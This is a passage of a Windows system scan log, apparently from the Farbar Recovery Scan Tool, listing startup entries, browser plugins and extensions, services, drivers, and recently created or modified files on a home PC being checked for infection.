Startup: C:\Users\RA Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
BootExecute: autocheck autochk * sdnclean64.exe
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
ProxyServer: 127.0.0.1:5222
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.dell.com
HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.dell.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.dell.com
URLSearchHook: ATTENTION ==> Default URLSearchHook is missing.
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?}
SearchScopes: HKLM-x32 - DefaultScope value is missing.
SearchScopes: HKCU - DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&rlz=
SearchScopes: HKCU - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://search.live.com/results.aspx?q={searchTerms}&src=IE-SearchBox&Form=IE8SRC
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&rlz=
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO-x32: Lexmark Printable Web -> {D2C5E510-BE6D-42CC-9F61-E4F939078474} -> C:\Program Files\Lexmark Printable Web\bho.dll ()
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKCU - No Name - {724D43A0-0D85-11D4-9908-00400523E39A} -  No File
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8064.0206.dll (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8064.0206.dll (Microsoft Corporation)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
 
FireFox:
========
FF ProfilePath: C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default
FF Homepage: about:home
FF NetworkProxy: "type", 0
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1202122.dll (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll (Foxit Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @virtools.com/3DviaPlayer -> C:\Program Files (x86)\Virtools\3D Life Player\npvirtools.dll (Dassault Systèmes)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\CrazyTalk4Native.dll (C3D)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\ctdomemhelper.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\ctframeplayerobject.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\ctplayerobject.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\imagickrt.dll (BEXTech)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\np-mswmp.dll (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npRLCT4Player.dll ( )
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npViewpoint.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\np_gp.dll (NOS Microsystems Ltd.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\rlcontentclass.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\RLMusicPacker.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\RLMusicUnpacker.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\RLVoicePacker.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\RLVoiceUnpacker.dll ()
FF Extension: Geolocater - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\geolocater@3liz.com [2013-05-08]
FF Extension: Google Toolbar for Firefox - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{3112ca9c-de6d-4884-a869-9855de68056c} [2010-12-09]
FF Extension: foursquarefox | foursquare for Firefox - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{8D8755DA-0541-4E4C-818A-99188622BA02} [2010-12-21]
FF Extension: DownloadHelper - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d} [2014-10-10]
FF Extension: Adobe DLM (powered by getPlus®) - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{E2883E8F-472F-4fb0-9522-AC9BF37916A7} [2009-10-28]
FF Extension: Firebug - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\firebug@software.joehewitt.com.xpi [2011-03-24]
FF Extension: Disable clipboard manipulations - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\nocopypaste@adblockplus.org.xpi [2014-02-11]
FF Extension: StumbleUpon - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{AE93811A-5C9A-4d34-8462-F7B864FC4696}.xpi [2011-06-14]
FF Extension: Adblock Plus - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2011-03-26]
FF Extension: Greasemonkey - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi [2012-08-25]
FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-04-11]
 
Chrome: 
=======
CHR Profile: C:\Users\Ashley\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Drive) - C:\Users\Ashley\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-08-27]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Ashley\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-28]
CHR Extension: (AdBlock) - C:\Users\Ashley\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2014-03-25]
CHR Extension: (Google Wallet) - C:\Users\Ashley\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-22]
CHR HKCU\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\Ashley\AppData\Local\Google\Drive\apdfllckaahabafndbhieahigkjlhalf_live.crx [2013-08-27]
CHR HKLM-x32\...\Chrome\Extension: [oejkcgajlodefenbbjdnaiahmbnnoole] - C:\Program Files (x86)\adawaretb\chrome-newtab-search.crx [2013-08-27]
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [143120 2013-05-23] (SUPERAntiSpyware.com)
R2 DockLoginService; C:\Program Files\Dell\DellDock\DockLogin.exe [155648 2008-09-23] (Stardock Corporation) [File not signed]
R2 dsl-db; C:\ProgramData\SingleClick Systems\MySQL\bin\mysqld.exe [5730304 2007-09-14] () [File not signed]
R2 dsl-fs-sync; C:\ProgramData\SingleClick Systems\Remote Access File Sync Service\dsl_fs_sync.exe [173296 2008-09-30] (SingleClick Systems)
S3 getPlusHelper; C:\Program Files (x86)\NOS\bin\getPlus_Helper.dll [51168 2009-09-23] (NOS Microsystems Ltd.)
R2 hnmsvc; c:\ProgramData\SingleClick Systems\Advanced Networking Service\hnm_svc.exe [820464 2008-09-30] (Dell Inc.)
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]
S2 lxduCATSCustConnectService; C:\Windows\system32\spool\DRIVERS\x64\3\\lxduserv.exe [29184 2009-10-16] (Lexmark International, Inc.)
R2 lxdu_device; C:\Windows\system32\lxducoms.exe [1039360 2009-10-16] ( )
R2 lxdu_device; C:\Windows\SysWOW64\lxducoms.exe [589824 2009-10-16] ( )
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2009-05-14] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2009-05-14] (Hewlett-Packard) [File not signed]
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 simptcp; C:\Windows\SysWOW64\tcpsvcs.exe [9728 2009-08-14] (Microsoft Corporation)
R2 SNMP; C:\Windows\System32\snmp.exe [49664 2008-01-20] (Microsoft Corporation)
R2 SNMP; C:\Windows\SysWOW64\snmp.exe [47616 2008-01-20] (Microsoft Corporation)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
S3 Tenable Nessus; C:\tools\Nessus\nessus-service.exe [11264 2011-02-25] (Tenable Network Security, Inc) [File not signed]
R2 wltrysvc; C:\Windows\System32\bcmwltry.exe [3051520 2008-11-17] (Dell Inc.) [File not signed]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 cpudrv64; C:\Program Files (x86)\SystemRequirementsLab\cpudrv64.sys [17864 2009-12-18] ()
R0 gfibto; C:\Windows\System32\drivers\gfibto.sys [14456 2013-07-18] (GFI Software)
R2 npf; C:\Windows\System32\drivers\npf.sys [35344 2011-02-11] (CACE Technologies, Inc.)
R3 RLDesignVirtualAudioCableWdm; C:\Windows\System32\DRIVERS\livecamv.sys [49664 2007-02-05] ()
S3 rspLLL; C:\Windows\System32\DRIVERS\rspLLL64.sys [23968 2013-02-07] (Resplendence Software Projects Sp.)
R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R0 SmartDefragDriver; C:\Windows\System32\Drivers\SmartDefragDriver.sys [21184 2013-12-24] (IObit)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2010-05-06] () [File not signed]
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [34808 2014-10-17] ()
U3 aic3pm17; C:\Windows\System32\Drivers\aic3pm17.sys [0 ] (Microsoft Corporation)
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S0 Lbd; system32\DRIVERS\Lbd.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S0 vmci; system32\DRIVERS\vmci.sys [X]
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-18 13:34 - 2014-10-18 13:30 - 00014582 _____ () C:\Users\Ashley\Desktop\dds.txt
2014-10-18 12:56 - 2014-10-18 12:58 - 00688992 ____R (Swearware) C:\Users\Ashley\Desktop\dds (1).com
2014-10-18 12:35 - 2014-10-18 12:35 - 00000000 _____ () C:\Users\Ashley\Desktop\bleep.txt
2014-10-17 18:03 - 2014-10-17 18:03 - 00000218 _____ () C:\Users\Study\AppData\Local\recently-used.xbel
2014-10-17 16:21 - 2014-10-17 18:04 - 00000000 ____D () C:\Users\Study\Ebooks
2014-10-17 16:04 - 2014-10-18 12:24 - 00244368 _____ () C:\Users\Ashley\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-17 14:41 - 2014-10-17 16:01 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-10-17 14:41 - 2014-10-17 14:41 - 00001192 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2014-10-17 14:41 - 2014-10-17 14:41 - 00001180 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2014-10-17 14:41 - 2014-10-17 14:41 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2014-10-17 14:41 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\Windows\system32\sdnclean64.exe
2014-10-17 14:40 - 2014-10-17 14:47 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 2
2014-10-17 14:26 - 2014-10-17 14:26 - 00000000 ____D () C:\Windows\Tasks\ImCleanDisabled
2014-10-17 13:49 - 2014-10-17 13:49 - 00003593 _____ () C:\Users\Ashley\Desktop\attach.zip
2014-10-17 13:48 - 2014-10-18 13:34 - 00012368 _____ () C:\Users\Ashley\Desktop\attach.txt
2014-10-17 13:29 - 2014-10-17 13:30 - 00688992 ____R (Swearware) C:\Users\Ashley\Downloads\dds.com
2014-10-17 13:20 - 2014-10-17 13:20 - 00035704 _____ () C:\Users\Ashley\Desktop\Addition.txt
2014-10-17 13:19 - 2014-10-17 13:20 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\Ashley\Downloads\tdsskiller (1).exe
2014-10-17 13:17 - 2014-10-17 14:08 - 00034808 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2014-10-17 13:17 - 2014-10-17 13:17 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-10-17 13:15 - 2014-10-17 13:15 - 15725144 _____ () C:\Users\Ashley\Downloads\RogueKiller.exe
2014-10-17 13:13 - 2014-10-18 14:22 - 00025960 _____ () C:\Users\Ashley\Desktop\FRST.txt
2014-10-17 13:13 - 2014-10-17 13:13 - 02112000 _____ (Farbar) C:\Users\Ashley\Downloads\FRST64 (1).exe
2014-10-17 11:53 - 2014-10-17 11:53 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\Ashley\Downloads\tdsskiller.exe
2014-10-17 11:41 - 2014-10-18 14:23 - 00000000 ____D () C:\FRST
2014-10-17 11:40 - 2014-10-17 11:40 - 02112000 _____ (Farbar) C:\Users\Ashley\Desktop\FRST64.exe
2014-10-17 10:57 - 2014-10-18 13:22 - 00071407 _____ () C:\Windows\WindowsUpdate.log
2014-10-17 10:55 - 2014-10-17 10:55 - 04862664 _____ (AVAST Software) C:\Users\Ashley\Desktop\avast_free_antivirus_setup_online.exe
2014-10-17 10:54 - 2014-10-17 10:54 - 01055936 _____ (Adobe) C:\Users\Ashley\Desktop\install_flashplayer15x32axau_mssd_aaa_aih.exe
2014-10-17 10:49 - 2014-10-17 11:36 - 00005078 _____ () C:\Windows\PFRO.log
2014-10-17 10:49 - 2014-10-17 10:50 - 05599416 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-17 08:53 - 2014-10-17 08:53 - 00000000 ____D () C:\Users\Ashley\aaaebookszip
2014-10-15 09:39 - 2014-10-15 10:01 - 00000000 ____D () C:\Users\Study\Desktop\Oct2014Pix
2014-10-15 09:26 - 2014-10-15 09:38 - 00000000 ____D () C:\Users\Study\Desktop\October2014Vids
2014-10-14 08:42 - 2014-10-14 08:42 - 00000000 ____D () C:\Users\Study\AppData\Roaming\WinRAR
2014-10-14 08:40 - 2014-10-14 08:51 - 00000000 ____D () C:\Users\Study\Desktop\Outlook 2013 Screenshots
2014-10-14 08:34 - 2014-10-17 16:05 - 00000680 _____ () C:\Users\Study\AppData\Local\d3d9caps.dat
2014-10-13 15:24 - 2014-10-13 15:24 - 07050784 _____ () C:\Users\Study\Downloads\Guide to Computer User Support for Help Desk and Support Specialists, A - Beisse.epub
2014-10-13 14:53 - 2014-10-13 14:53 - 00000000 ____D () C:\Users\Study\AppData\Local\Adobe
2014-10-13 14:38 - 2014-10-17 17:25 - 00000000 ____D () C:\Users\Study\AppData\Roaming\deluge
2014-10-13 14:19 - 2014-10-13 14:19 - 00000780 _____ () C:\Users\Public\Desktop\Deluge.lnk
2014-10-13 11:58 - 2014-10-13 11:58 - 00001987 _____ () C:\Users\Study\Desktop\Google Chrome.lnk
2014-10-13 11:52 - 2014-10-13 15:35 - 00000000 ____D () C:\Users\Study\AppData\Roaming\Adobe
2014-10-13 11:52 - 2014-10-13 11:52 - 00000000 ____D () C:\Users\Study\AppData\Local\Stardock_Corporation
2014-10-13 11:51 - 2014-10-13 11:51 - 00244368 _____ () C:\Users\Study\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-13 11:51 - 2014-10-13 11:51 - 00000000 ____D () C:\Users\Study\AppData\Roaming\Dell
2014-10-13 11:49 - 2014-10-17 16:21 - 00000000 ____D () C:\Users\Study
2014-10-13 11:49 - 2014-10-13 11:57 - 00000000 ____D () C:\Users\Study\AppData\Local\Google
2014-10-13 11:49 - 2014-10-13 11:49 - 00000951 _____ () C:\Users\Study\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-10-13 11:49 - 2014-10-13 11:49 - 00000941 _____ () C:\Users\Study\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-10-13 11:49 - 2014-10-13 11:49 - 00000936 _____ () C:\Users\Study\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2014-10-13 11:49 - 2014-10-13 11:49 - 00000917 _____ () C:\Users\Study\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows Mail.lnk
2014-10-13 11:49 - 2014-10-13 11:49 - 00000020 ___SH () C:\Users\Study\ntuser.ini
2014-10-13 11:49 - 2014-10-13 11:49 - 00000000 ____D () C:\Users\Study\AppData\Roaming\Apple Computer
2014-10-13 11:49 - 2014-10-13 11:49 - 00000000 ____D () C:\Users\Study\AppData\Local\MediaDirect
2014-10-13 11:49 - 2014-03-16 11:06 - 00000000 ____D () C:\Users\Study\AppData\Roaming\IObit
2014-10-13 11:49 - 2011-07-23 17:03 - 00000000 ____D () C:\Users\Study\AppData\Roaming\Macromedia
2014-10-13 11:49 - 2009-10-13 04:15 - 00000000 ____D () C:\Users\Study\AppData\Local\Microsoft Help
2014-10-13 11:49 - 2008-01-20 20:20 - 00000000 ___RD () C:\Users\Study\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-10-13 11:49 - 2008-01-20 20:20 - 00000000 ___RD () C:\Users\Study\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-10 13:31 - 2014-10-10 13:31 - 00003098 _____ () C:\Windows\System32\Tasks\{0E00E117-897C-40D1-869B-22B9CCA0F27C}
2014-10-10 10:22 - 2014-10-10 10:23 - 31766208 _____ (Microsoft Corporation) C:\Users\Ashley\Downloads\Windows-KB890830-x64-V5.16.exe
2014-10-10 09:51 - 2014-10-17 10:08 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-10 09:51 - 2014-10-10 09:51 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\48230029.sys
2014-10-10 09:43 - 2014-10-10 09:43 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-10 09:42 - 2014-10-10 09:43 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-10 09:42 - 2014-05-12 07:26 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-09 15:42 - 2014-10-10 12:14 - 00000000 ____D () C:\Users\Ashley\AppData\Roaming\Zahyqe
2014-10-09 15:42 - 2014-10-10 12:14 - 00000000 ____D () C:\Users\Ashley\AppData\Roaming\Uxbuxy
2014-10-09 15:41 - 2014-10-09 15:41 - 00081408 _____ () C:\Windows\system32\mpcete.dll
2014-10-09 15:41 - 2014-10-09 15:41 - 00003858 _____ () C:\Windows\System32\Tasks\{B5CED0A0-FE3D-C163-11B3-D01C230EF0A0}
2014-10-09 15:41 - 2014-10-09 15:41 - 00000000 _____ () C:\Windows\system32\rfbju.dll
2014-10-09 13:47 - 2014-10-09 13:48 - 00000378 _____ () C:\Users\Ashley\Desktop\testeskill.txt
2014-10-09 13:20 - 2014-10-09 13:20 - 00064443 _____ () C:\Users\Ashley\Downloads\docs.zip
2014-10-08 09:05 - 2014-10-08 09:05 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Deluge
2014-10-08 09:05 - 2014-10-08 09:05 - 00000000 ____D () C:\Program Files (x86)\Deluge
2014-10-08 09:04 - 2014-10-08 09:04 - 13590162 _____ () C:\Users\Ashley\Downloads\deluge-1.3.9-win32-setup.exe
2014-10-08 09:02 - 2014-10-08 09:02 - 00003038 _____ () C:\Windows\System32\Tasks\{592F96FF-345C-4DC9-A076-6BD9C5A145DA}
2014-09-30 14:18 - 2014-10-10 12:14 - 00000000 ____D () C:\Users\Ashley\AppData\Roaming\Xepoxyo
2014-09-30 10:03 - 2014-09-30 10:14 - 00001090 _____ () C:\Users\Guest\Desktop\ScottsdaleInsPhoneInterviewNotes.txt
2014-09-26 18:14 - 2014-09-26 18:14 - 00001489 _____ () C:\Users\Guest\Desktop\gtz.txt
2014-09-24 10:54 - 2014-09-24 17:28 - 00004003 _____ () C:\Users\Guest\Desktop\depr.txt
2014-09-18 14:41 - 2014-09-18 14:41 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-09-18 14:39 - 2014-09-18 14:41 - 00000000 ____D () C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-09-18 14:39 - 2014-09-18 14:41 - 00000000 ____D () C:\Program Files\iTunes
2014-09-18 14:39 - 2014-09-18 14:40 - 00000000 ____D () C:\Program Files (x86)\iTunes
2014-09-18 14:39 - 2014-09-18 14:39 - 00000000 ____D () C:\Program Files\iPod
2014-09-18 14:19 - 2014-09-18 14:20 - 112794960 _____ (Apple Inc.) C:\Users\Ashley\Downloads\iTunes64Setup.exe
2014-09-18 14:13 - 2014-09-18 14:14 - 112794960 _____ (Apple Inc.) C:\Users\Guest\Downloads\iTunes64Setup.exe
2014-09-18 12:38 - 2014-09-18 13:31 - 00000000 ____D () C:\Users\Guest\Desktop\iPhone BackupSept14
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-18 14:26 - 2012-09-29 15:56 - 00000940 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2293499177-2261026601-659138957-500UA.job
2014-10-18 14:20 - 2006-11-02 08:22 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-18 14:20 - 2006-11-02 08:22 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-18 13:56 - 2012-09-29 15:45 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-18 13:51 - 2009-10-18 15:53 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-18 13:14 - 2009-09-29 18:02 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-18 12:34 - 2014-01-02 15:19 - 00000000 ____D () C:\Users\Ashley\Desktop\Desktop Folders
2014-10-18 12:26 - 2012-09-29 15:56 - 00000888 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2293499177-2261026601-659138957-500Core.job
2014-10-18 12:24 - 2013-10-16 15:07 - 00000000 ____D () C:\Users\Ashley\AppData\Local\Deployment
2014-10-18 12:23 - 2009-10-18 15:53 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-18 12:20 - 2008-12-22 12:22 - 00000000 ____D () C:\ProgramData\TEMP
2014-10-18 12:19 - 2006-11-02 08:42 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
